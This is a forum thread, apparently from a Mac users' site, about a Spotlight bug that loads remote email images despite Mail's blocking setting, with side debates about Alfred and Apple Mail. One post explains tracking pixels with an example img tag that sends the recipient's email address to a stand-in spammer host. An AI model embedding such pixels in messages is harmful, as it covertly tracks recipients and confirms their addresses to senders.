I never left Alfred. Spotlight sucks. With Alfred, I can simply type FIND, OPEN, or IN, and I can either find the file I want, open the file I want, or search inside the file I want (plus lots of other cool stuff).

I've done the exact same search with Alfred and Spotlight and I find what I'm looking for about 10x faster with Alfred. I use Cocktail to hide that Spotlight icon and use COMMAND-SPACE for Alfred. Works like a charm.

I was optimistic after watching the Spotlight demo during the Apple keynote, but Alfred is just so fast and supports doing some pretty fancy stuff. Oh Alfred how I've missed you!
 
Security issues in OSX and iOS don't bother me at all, as long as the device I am using is The Thinnest One Ever Made By Apple.
 
The only thing that bothers me is that it comes with a lot of stuff allowed when you first install it. It's all "important" for the OS to run smoothly. I wonder how much of that stuff could really be blocked, or how much stuff is getting through those holes? There is so much crap going on behind our backs...I'm SO glad Apple is SO concerned about our privacy. Pfft.

I'm not familiar with those presets you mention. I've been running it since version 1 so perhaps it's kept all of my original settings. You don't really have to 'wonder' what's getting out - just monitor your network. I'm going to go out on a limb and suggest that YOU should primarily be concerned with your privacy, as easy as it is to vilify apple or any other company for that matter.
 
I miss Steve

He might have gotten bad press for his dedication to perfection, but in fact, this is what made OS X great, and eventually the dragon slayer of Microsoft in the foible department.
Now we've got a mountain of snafus to point to, makes you go hmmmm......
Please, programmers, stop rushing to get crap out the door.
You have opened beta testing to the masses, use the data retrieved wisely.
 
I supposed Apple hired a bunch of programmers recently.

I wish they did. Apple doesn't have nearly enough programmers, it seems or they wouldn't have such buggy software all the time. Now they're trying to have one year cycles for OS X and iOS both. It's not working out too well for them, IMO. I hear stories of constantly shuffling people around that know what they're doing so they can fix this and that, but that leaves other people finishing the work they started, etc. I believe Scott Forstall quit due to this sort of treatment (the "Maps" thing being a direct result of people quitting and people being shuffled) and that IS a shame since Ive doesn't know WTF he's doing when it comes to software, IMO.
 
What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.
 
aren't most of these so called troublesome emails meant to be in the spam/junk mail folder anyway?

just have spotlight ignore the junk folder

Or just have spotlight check your html e-mail load settings prior to searching through your e-mails and loading the spam images (confirming you are a valid e-mail address to the bad guys).

The Spotlight folks just missed this in their requirements - probably won't be too terrible to fix it...course that's the thing, Apple needs to fix this not ignore it, since it's a privacy related thing I would guess they will.
 
Right On

What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.


IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.
 
aren't tracking pixels relevant only in spam emails? and you have to open the email for them to work right?
 
What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.

I'm sure a lot of websites you visit have some content being loaded by something that gives info to a spammer. Enable the Safari status bar, disable AdBlock, and see how many random domains you connect to just to load a simple blog somewhere.
 
tutorial:

delete yosemite

end of tutorial.

Does this only affect Yosemite? The article didn't say anything. Spotlight searches Mail messages in some earlier versions of OS X too, I think even Tiger.

----------

Well, you should (also on your iOS devices, BTW). Many other email clients have this setting enabled by default.
You can still download the images for individual mails by clicking a button. They just don't get downloaded automatically for every email.

I remember enabling remote images because I kept getting non-spam emails that contained them. I got zero spam until my mom gave my email address out to some stupid websites, and I still hardly get any.
 
You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.
 
And I'm sure that the NSA knew about this one months ago...

----------

You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

Not having waded through the earlier posts, this 'bug' seems to involve Spotlight, more than Mail, correct?

Mail has been flaky for me. Anything involving filtering, and it seems to have a mind of its own.
 
Good to know, and worth fixing.

But as a heavy Spotlight user and mail-searcher for years, I don't think I have EVER quick-looked a spam message.

You might by accident, but it's definitely what I'd call an edge case. Spam messages aren't likely to look (by title) like the thing you were searching for, so you won't need to quicklook them.

I'll try to contain my panic.

You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

It is, for most people, but experiences vary and people have a million different complex email needs. Apple Mail has been excellent for me! The filters especially have been a lifesaver. Color codes and special sounds and auto-filing galore!

I do know it had a bad spell around a year ago for GMail users: Google doesn't follow normal email standards (which isn't a criticism: GMail is meant to be different) and Apple's attempt to improve how that was handled did not go smoothly. But it was addressed, and GMail seems fine now through Apple Mail: most of the mail I get is through Google in fact.
 
Another reason not to use the crappy mail app. Now I know why I have always stuck to using the webmail interface.

Will Apple ever get their act together and overhaul the damn app and actually make it usable?

From this report, it seems that the glitch is with Spotlight, not with Mail.app, at least not directly. Mail might be providing a Spotlight plugin, and that plugin may need to be fixed, but the app itself doesn't suffer from this vulnerability, or am I misreading something?

Mail.app has been the best mail client that I've used in the past 10 years. I'm not saying it's always been perfect, but compared to the painful experience of supporting clients using the myriad of Outlook/Express versions, my Mail experience has been fantastic and virtually flawless.

I frequently have 6 to 12 IMAP-based accounts setup in my Mail.app at one time, and except for a few connection problems here and there, solved with some patience and reboot of the app, it's been a pleasure to use.

----------

IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.

It's about data collection and correlation. Your public IP address (WAN address, not internal LAN address) quite often reveals your geographic area in the world, so they can use that data to build analysis reports of which geographic areas in the world are most effective to be targeted. This also ties back to web advertising campaigns, which can be geographically targeted. So you may receive a spam message, they get your IP address, determine your location, and then you start seeing web ads as a result. It's all about the data.
 
That is actually very untrue. The majority of the spam computers that send out those spam emails have no way of monitoring your specific email account. They don't track if the email is valid, either. If they get a bounce back saying the email doesn't exist, they still continue to send repeated emails. They also aren't going to waste the time calculating "if you opened your email and read the ad", they're going to send you continual ads regardless.

Scam pixels are often used just for overall statistics, like "20% of the people we send ads to are in this part of the world using this version of OS X".
That's not true; as others have pointed out, many spammers prefer to use lists of "confirmed" e-mail addresses, which sell for much higher prices.

This would also require that a DIFFERENT version of the spam pixel is loaded for each email, so they could uniquely target each person they send the email to. It's much more cost-efficient to just send out mass emails, rather than track each of the millions of emails individually.
Not at all. You can do it quite trivially with only one spam pixel image, like this:

<img src="http://myevilspamsite.com/spam_pixel.jpg?address=johndoe@whatever.com" />

Then, using the same software that they use to put "Hello johndoe," at the top of the emails they send you, they can simply swap the appropriate address into the img tag. Voilà; one image, verifying millions of addresses.

Bottom line: loading images should be turned off for security reasons, and it's pretty bad if Spotlight is ignoring that setting.
 
If I understood the article correctly it comes across as needlessly confusing.

So in short, Apple Mail has an option that prevents remote loading of images in email (unless you specifically request them). This is a handy thing to do as spammers can track whether you've received an email by embedding an effectively invisible image in the email they send you. When you open the email the image is requested from the remote server providing confirmation and your IP address (which can be referenced against other sales databases for targeted marketing).

You should enable that feature in your email client.

Whether you have or have not done this in Apple Mail, though—what does that have to do with the Spotlight bug? What is said here is that when you open the email in spotlight (all you have to do is *click* on the email name, but if you don't do that it shouldn't open the email) it will not honor that setting from Apple Mail (as it should). The data would still be returned if you haven't set this feature up in Apple Mail.

So for now, if this is something you have taken steps to protect against, don't click on those emails or disable indexing of email from Spotlight until Apple (hopefully) fixes the issue. In either case, it's a bummer of a move for people who know enough to have kept an email address relatively or completely spam free and use Spotlight to browse email addresses, but contrary to what a few have suggested, I can think of much bigger security issues or bugs that have cropped up in recent history.

This relevant to the discussion?

https://fix-macosx.com

:rolleyes:
Not really?

And depends on how paranoid someone wants to be (or has actual reason to be).
 
Dumb question, though perhaps the article should've said this, but is this unique to Yosemite or are other versions affected? It sounds like it's unique to Yosemite, but further clarification here would be great.

Using Mavericks, I can answer a "yes" to this. It's easy to tell - if you have remote image display off in Mail.app, then you know how a, for example, Target.com or Apple.com e.mail looks with images off. When you search in Spotlight on the Mac, for something like the subject of an e.mail from Target/Apple, it will list the subject, and if you hover your mouse over it, to the left of it, a preview of the e.mail is generated. In this preview, the remote images are displayed.

Something to note - *usually* remote images are used by legit marketers - e.g.: you signed up with Target, perhaps, after you ordered something from them, so you opted into their weekly e.mails. They want to know who's picking up those e.mails and what they are clicking on and what mail clients are being used [which can be useful - that way they make sure to test their HTML e.mails with mail clients that people are using]. If you didn't want this weekly e.mail, you click an 'unsubscribe' link, and it is honored.

A typical spammer gets your address via means that are not by permission and there is no legit unsubscribe link. In fact, sometimes if one is included, it is a baited website that simply confirms you have a valid address and then that address is added to a list of known good addresses and sold to spammers.

What Apple should do is what many other MUAs have done [Mail User Agents]. Make it so if you whitelist an address [eg: adding the Target address to your address book], the remote images will display. But if you get an e.mail from an unknown address, it won't display. Or at least give users that option. I don't mind allowing some legit organizations know that I opened their e.mail and am using a Mac and all that; but I certainly don't want to inform a Russian bride website that the address they sent a message to is valid; they may not take me off of their list, but at least my address won't be added to more lists!

/vjl/
 
You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

I had endless problems getting Mail to check the mail immediately after pressing the get mail button. This started back when they even acknowledged a problem with getting mail. Their fix improved things (it would eventually auto-check the mail after it instead of sitting there for days not checking it unless I exited and restarted). But it would still not reliably check the mail immediately after pressing that button so I switched to Thunderbird that would. The other problem is that Apple won't update their apps anymore unless you upgrade the entire OS. You used to at least get updates for a few versions after a new OS X version would come out. Now they use updates as leverage to try and push you into upgrading to Yosemite (and whatever comes after, etc.) That is simply unacceptable, IMO. The same is true of Safari.
 
Or just have spotlight check your html e-mail load settings prior to searching through your e-mails and loading the spam images (confirming you are a valid e-mail address to the bad guys).

The Spotlight folks just missed this in their requirements - probably won't be too terrible to fix it...course that's the thing, Apple needs to fix this not ignore it, since it's a privacy related thing I would guess they will.

Well no cause some of us like to remote load images. We want to see those. Just not the ones we filtered/rules into junk or deleted. So spotlight would also need to read the rules we set as well to see if we have set a rule to delete certain emails.
 